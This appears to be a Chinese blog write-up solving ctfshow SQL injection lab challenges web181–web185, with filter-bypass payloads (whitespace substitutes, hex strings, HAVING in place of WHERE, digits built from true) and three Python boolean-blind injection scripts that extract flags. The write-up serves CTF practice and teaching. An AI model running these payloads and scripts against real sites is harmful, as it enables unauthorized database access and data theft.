ctfshow-web入门-sql注入(web181-web185)

最新推荐文章于 2024-08-06 04:26:07 发布
最新推荐文章于 2024-08-06 04:26:07 发布
阅读量885 收藏 17
点赞数 10
分类专栏: SQL ctfshow web 文章标签: sql 数据库 web安全 学习 web mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/140901940
版权
web 同时被 3 个专栏收录
179 篇文章 22 订阅
订阅专栏
ctfshow
78 篇文章 2 订阅
订阅专栏
SQL
33 篇文章 2 订阅
订阅专栏

目录

1、web181

2、web182

3、web183

4、web184

5、web185

1、web181

过滤字符:

(1)空白字符:空格 ( )、水平制表符 (\x09)、换行符 (\x0a)、垂直制表符 (\x0b)、换页符 (\x0c)、空字符 (\x00)、回车符 (\x0d)、不换行空格 (\xa0)

(2)符号:星号 (*)、井号 (#)

(3)关键词(不区分大小写):file、into、select

实际测试 %0c 还是可以用:

1'--%0c

采用万能密码:

1'||1--%0c

 

拿到 flag:ctfshow{bef90a74-9ae2-4c76-8111-0ea0406f120b}

显示 username 为 flag 的行也可以:

0'||username='flag

2、web182

新增关键字 flag 的过滤,用 %0c :

1'||1--%0c

拿到 flag:ctfshow{ee8c935f-360a-47c2-99aa-0238ee9c0289}

此外,用 %01 到 %08 都可以:

1'||1--%01

还可以用 like 结合 % 进行通配绕过:

0'||%0cusername%0clike'f%

% 可以匹配任何数目的字符,类似于前面我们用过的通配符 *

 

而 _ 可以匹配单个字符: 

0'||%0cusername%0clike'f___

3、web183

post 提交一个 tableName 参数进行查询,猜测表名还是 ctfshow_user:

tableName=ctfshow_user

可以看到一共有 22 条记录 

单独查 flag 的这条数据:空格过滤了用括号代替

tableName=(ctfshow_user)where(pass)like'ctfshow{%'

回显 1  

查询失败或者查一条不存在的记录:

tableName=(ctfshow_user)where(pass)like'test'

回显 0 

很典型布尔盲注的特征

我们可以不断往 flag 后面新增字符进行猜解,比如下面先猜测 flag 的前五个字符为 ctfsh ,后面是通配任意数量字符,回显是 1 ,说明我们猜测正确了。

tableName=(ctfshow_user)where(pass)like'ctfsh%'

其实我们知道的部分为:ctfshow{

因此我们在此基础上继续往后面猜测:

附上勇师傅自己写的 python 脚本,虽然就这么一个短短的简单脚本,我真的调试了好久。。。

所以,好好学编程吧。

import requests
import string
url = 'http://abc922e7-01ed-4d9a-85a1-4f67a3ff5f32.challenge.ctf.show/select-waf.php'
dic = string.digits+string.ascii_lowercase+'-{}'  # flag可能的字符
# print(dic)
out = 'ctfshow{'  # 已经确定的部分
for j in range(0, 50):  # 为了确保flag完整输出,范围尽量大一点,观察到flag完全输出后结束运行即可
    for k in dic:
        payload = {'tableName': f"(ctfshow_user)where(pass)like'{out+k}%'"}  # 将每次更新后的out加上我们新增的一个猜测字符添加到payload
        # print(payload)
        re = requests.post(url, data=payload)
        # print(re.text)
        if '$user_count = 1;' in re.text:
            print(k)
            out += k
            break  # 回显1说明我们猜正确了,跳出内层循环,继续猜下一位
    print(out)

拿到 flag:ctfshow{3f02d61c-3941-4a3f-8607-9abd3a6519f3} 

4、web184

新增过滤掉了 where ,使用 having 代替:

having 是从前筛选的字段再筛选,而 where 是从数据表中的字段直接进行的筛选的,如果已经筛选出了某个字段,这种情况下 having 和 where 等效,但是如果没有 select 某个字段,后面直接 having 这个字段,就会报错。

select goods_price,goods_name from sw_goods where goods_price > 100
与
select goods_price,goods_name from sw_goods having goods_price > 100
等效

但是 

select goods_name,goods_number from sw_goods where goods_price > 100
正常
select goods_name,goods_number from sw_goods having goods_price > 100
报错,因为前面并没有筛选出 goods_price 字段

过滤了引号,使用十六进制绕过 

这里没有过滤空格 

tableName=ctfshow_user group by pass having pass like 0x63746673686f777b25

回显成功 

对前面的脚本进行修改:

import requests
import string
url = 'http://edb25716-636e-4234-bea4-4d0d6eccae00.challenge.ctf.show/select-waf.php'
dic = string.digits+string.ascii_lowercase+'-{}'  # flag可能的字符
dic = [f"{ord(c):02x}" for c in dic]  # 将字符转为十六进制格式
# print(dic)
out = '0x63746673686f777b'  # 已经确定的部分
for j in range(0, 50):  # 为了确保flag完整输出,范围尽量大一点,观察到flag完全输出后结束运行即可
    for k in dic:
        # print(k)
        # payload = {'tableName': f"(ctfshow_user)where(pass)like'{out+k}%'"}  # 将每次更新后的out加上我们新增的一个猜测字符添加到payload
        payload = {'tableName': f"ctfshow_user group by pass having pass like {out+k}25"}
        # print(payload)
        re = requests.post(url, data=payload)
        # print(re.text)
        if '$user_count = 1;' in re.text:
            print(k)
            out += k
            break  # 回显1说明我们猜正确了,跳出内层循环,继续猜下一位
    print(out)

得到:0x63746673686f777b37313064383239362d363661612d343335622d623364392d3137616539643639393162337d 

将十六进制转为字符串 

拿到 flag:ctfshow{710d8296-66aa-435b-b3d9-17ae9d6991b3} 

5、web185

过滤掉了数字

可以使用 true 结合 concat 拼接出数字

附上 yu 师傅的脚本: 

#author:yu22x
import requests
import string
url="http://8319afbf-281c-4a73-b14e-a29426d0e556.challenge.ctf.show/select-waf.php"
s='0123456789abcdef-{}'
def convert(strs):
  t='concat('
  for s in strs:
    t+= 'char(true'+'+true'*(ord(s)-1)+'),'
  return t[:-1]+")"
flag=''
for i in range(1,45):
  print(i)
  for j in s:
    d = convert(f'^ctfshow{flag+j}')
    data={
    'tableName':f' ctfshow_user group by pass having pass regexp({d})'
    }
    #print(data)
    r=requests.post(url,data=data)
    #print(r.text)
    if("user_count = 1"  in r.text):
      flag+=j
      print(flag)
      if j=='}':
        exit(0)
      break

拿到 flag:ctfshow{11e04c1b-6151-4696-81bf-8dba64323cfb}

Myon⁶
关注
专栏目录
sql注入————ctfshowsql注入
qq_45655564的博客
06-07 1929
web171 -1’ union select 1,2,password from ctfshow_web.ctfshow_user–+ web172 -1’ union select 2,password from ctfshow_user2–+ web173 -1’ union select 1,2,password from ctfshow_user3–+ web174 -1’ union select ‘a’,replace(replace(replace(replace(replace(repla
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 300
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
ctfshow_web181
qq_38634097的博客
05-29 173
代码过滤了一些字符,但是没有过滤or和and,试着使用一下万能密码:
[ctfshow]-web185
weixin_52116519的博客
02-27 3040
//过滤数字 function waf($str){ return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str); } 原理 true 等于1 ,用 true 相加可以构造数字 char(120)=x, 所以char(tru
ctfshow-web入门-sql注入web186-web190)
最新发布
Welcome To Myon'Blog !
08-06 1181
在上一题中我们提到了,使用 true+true 的方法构造出数字比如 true+true+true 就可以构造出 3,再使用 char 函数将数字转为对应的 ASCII 字符,最终实现我们 payload 的转换。在 SQL 中,数字和字符串的比较是弱类型的,如果在比较操作中涉及到字符串和数字,SQL 会尝试将字符串转换为数字,那么只要字符串不是以数字开头,比较时都会转为数字 0。拿到 flag:ctfshow{e54220e0-e81f-4e0e-ad32-0bbbbdd43d83}
ctfshow web入门 web180--web185
2301_81040377的博客
04-21 405
mysql操作符优先级:(数字越大,优先级越高)借用大佬的图,这里使用运算符等级绕过。过滤了单双引号,那么我们就用。我发现脚本越来越复杂了。先放个脚本我去学一下。
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 366
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 626
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 996
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库web2。
CTFSHOW-WEB入门代码审计篇
Re_ly0n的博客
11-02 476
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow学习记录-web入门sql注入181-190)
龟速更新的九某人
09-24 2324
ctfshow学习记录-web入门sql注入web181-web190)
ctfshow sql180-185
2202_75317918的博客
11-24 2289
23被过滤,没办法注释了,还可以用’1’='1来闭合后边。或者使用--%0c--
ctfshow web入门 SQl注入 web185--web190
2301_81040377的博客
04-22 329
这道题还有另外一个脚本就是用concat的拼接达到有数字的目的。正则绕过上面的东西并且password只能是数字而且是整数。username带引号了,但是密码的返回还是一样,先找回显。username没有用引号所以还可以用if或者case。这道题密码被MD5 加密,而且第二个参数是true。flag在api/index.php文件中。然后上脚本(Y4tacker这个师傅的)8-4-4-4-12自己把flag写出来。类似与一个万能密码就可以绕过。登录成功但是没有回显。
[ctfshow]web183 已知表名的布尔盲注
www.lazy.kim
06-10 247
【代码】[ctfshow]web183 已知表名的布尔盲注。
CTFchow web181-185
m0_73756016的博客
01-29 817
where可以用having替换 查看官方文档,看看select语法。#把ctfshow_user取别名为a 又把其取别名为b 查询表ctfshow_user里pass列的ctfshow%过滤的有点多,where、单双引号、反引号都被过滤了,但是本题没有过滤空格。因为每次查询记录总数都是1条,就是我们要找的flag,所以页面固定会出现。:可以前面加x,后面用引号包裹或者0x;true+true=2,所以通过相加,任何数字我们都可以构造出来。可以看到源代码里面有and可以在and后面加or使其。
ctfshow web183-200
songmoshangchen的博客
05-18 189
因为 % 会自动匹配>=一个字符 所以最后一个主机加上就好了。因为 % 会自动匹配>=一个字符 所以最后一个主机加上就好了。跑到最后的时候自己加上“}”跑到最后的时候自己加上“}”
ctf_show笔记篇(web入门---sql注入)171-189
whale_waves的博客
03-12 1134
例如:原理,flag是十六进制的,最大到f所以可以用后面的英文来替换。利用into outfile来将查询到的表的内容写入到服务器的文件里。但这种情况一般需要知道web的地址例如/var/www/html/再利用python或者其他或者人工逆向替换回来。
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了防止SQL注入攻击,应该使用参数化查询并对用户输入进行严格验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值